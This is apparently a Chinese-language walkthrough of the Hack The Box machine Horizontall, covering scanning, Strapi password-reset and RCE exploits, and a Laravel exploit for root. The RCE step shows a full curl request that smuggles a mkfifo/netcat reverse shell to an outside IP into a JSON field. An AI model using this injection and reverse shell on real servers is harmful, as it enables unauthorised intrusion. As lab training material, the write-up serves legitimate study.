基本信息
data:image/s3,"s3://crabby-images/9c12d/9c12dbcb7c384830844ce85c253250076d5058a2" alt=""
端口扫描
22和80
1 | nmap -sC -sV 10.10.11.105 |
80
需要加hosts:
1 | 10.10.11.105 horizontall.htb |
data:image/s3,"s3://crabby-images/8595f/8595f69f4a221a34a7e88d7fd51f9d2bbd69ca6f" alt=""
子域名
需要一个大字典扫描,得到api-prod.horizontall.htb:
1 | gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u horizontall.htb |
api-prod.horizontall.htb
data:image/s3,"s3://crabby-images/dd7cf/dd7cfe867e5b18ad768380da6f6d8e57f35fbe7e" alt=""
目录扫描
常规目录扫描:
1 | gobuster dir -u http://api-prod.horizontall.htb/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50 |
admin
Strapi:
data:image/s3,"s3://crabby-images/2a402/2a4023e6ca468328df47ebc9fe2da7d058e8ee6e" alt=""
Strapi
可以搜到相关漏洞:
- Exploiting friends with CVE-2019-18818 – thatsn0tmysite
https://thatsn0tmysite.wordpress.com/2019/11/15/x05/ - Strapi Framework Vulnerable to Remote Code Execution (CVE-2019-19609) :: { bit.therapy }
https://bittherapy.net/post/strapi-framework-remote-code-execution/
reset password
账号简单猜测admin@horizontall.htb,重置密码登录:
1 | curl http://api-prod.horizontall.htb/admin/strapiVersion |
data:image/s3,"s3://crabby-images/c3bc4/c3bc43bf4ca7f31e3e7efcd5daa4bed8a231eabb" alt=""
data:image/s3,"s3://crabby-images/fae2c/fae2ccd969ce7ffb861bac4fdaff977c44e44d55" alt=""
RCE
JWT就是前面重置密码得到的,另外content-length小问题,可以转到burp里修复后重放,getshell:
1 | curl -i -s -k -X $'POST' -H $'Host: api-prod.horizontall.htb' -H $'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwNDc3MDQ3LCJleHAiOjE2MzMwNjkwNDd9.VncxiviJLdAYIYqUOZXNBr6QnwM_8j8qmsPxH6zYl3s' -H $'Content-Type: application/json' -H $'Origin: http://api-prod.horizontall.htb' -H $'Content-Length: 123' -H $'Connection: close' --data $'{\"plugin\":\"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 4444 >/tmp/f)\",\"port\":\"1337\"}' $'http://api-prod.horizontall.htb/admin/plugins/install' --proxy http://127.0.0.1:8087 |
data:image/s3,"s3://crabby-images/fe816/fe8163283aa4d685c6ef88c82d796c75991b611b" alt=""
data:image/s3,"s3://crabby-images/e56cd/e56cd3afe902eafc12bffecc29fc117d6a67b085" alt=""
写公钥方便后续操作:
1 | cd ~ |
user flag
user.txt在develpoer目录中,strapi用户有权限读取:
data:image/s3,"s3://crabby-images/b86fa/b86fa10ec969befad5ad2505105d40d04c742393" alt=""
提权信息
可以发现本地8000端口,转发查看:
1 | ssh -L 8000:127.0.0.1:8000 strapi@10.10.11.105 |
data:image/s3,"s3://crabby-images/409f5/409f5709848bb0c3ad8397275ed70436e1fc1284" alt=""
data:image/s3,"s3://crabby-images/fb7bb/fb7bb647dac521afeef3944c9c24426d8667b09d" alt=""
Laravel,搜到相关漏洞:
- nth347/CVE-2021-3129_exploit: Exploit for CVE-2021-3129
https://github.com/nth347/CVE-2021-3129_exploit
提权 & root flag
exp一键打:
data:image/s3,"s3://crabby-images/4c93e/4c93e9fa6fd3059168bbef61d875919546b9fcfa" alt=""
data:image/s3,"s3://crabby-images/716ec/716ec7ebb34b8d8ae6ce99481ab240e0746fae96" alt=""
参考资料
- Exploiting friends with CVE-2019-18818 – thatsn0tmysite
https://thatsn0tmysite.wordpress.com/2019/11/15/x05/ - Strapi Framework Vulnerable to Remote Code Execution (CVE-2019-19609) :: { bit.therapy }
https://bittherapy.net/post/strapi-framework-remote-code-execution/ - nth347/CVE-2021-3129_exploit: Exploit for CVE-2021-3129
https://github.com/nth347/CVE-2021-3129_exploit - HTB Horizontall [Discussion] | RaidForums
https://raidforums.com/Thread-Tutorial-HTB-Horizontall-Discussion